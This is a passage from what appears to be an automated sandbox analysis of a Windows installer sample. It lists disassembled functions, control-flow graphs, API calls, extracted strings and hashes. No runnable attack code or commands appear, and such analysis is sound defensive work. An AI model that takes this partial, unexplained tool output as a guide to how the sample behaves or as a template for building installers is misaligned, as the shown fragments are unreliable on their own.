                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                        • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                                                                                                                                                                                                        Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                        • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                          • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                        • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                        • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                        • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                        • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                                        • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                        • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                                                                                                                                                                        Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,00000000,PaypalInteriorNvidiaNirvana,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,PaypalInteriorNvidiaNirvana,PaypalInteriorNvidiaNirvana,00000000,00000000,PaypalInteriorNvidiaNirvana,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042795A,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$PaypalInteriorNvidiaNirvana
                                                                                                                                                                                                                                                                                        • API String ID: 4286501637-474588278
                                                                                                                                                                                                                                                                                        • Opcode ID: 64a557673ae3d0e019bdca1bc4e77ebfe7370d638d91dc23aa74aa5952768e1c
                                                                                                                                                                                                                                                                                        • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 64a557673ae3d0e019bdca1bc4e77ebfe7370d638d91dc23aa74aa5952768e1c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                                                                                                                                                                        Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                        • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                        • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                        • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                        • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                                        • Opcode ID: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                                                                                                                                                                                                        • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                                                                                                                                                                                        Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                        • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,0042795A,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                        • String ID: (]C$... %d%%$ZyB$pAB
                                                                                                                                                                                                                                                                                        • API String ID: 651206458-4104317456
                                                                                                                                                                                                                                                                                        • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                        • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                                                                                                                                                                        Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00445D80,0042795A,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042795A,771B23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                        • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                                                                                                                                                                                                        Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                        • GlobalFree.KERNELBASE(00761BA8), ref: 00402387
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
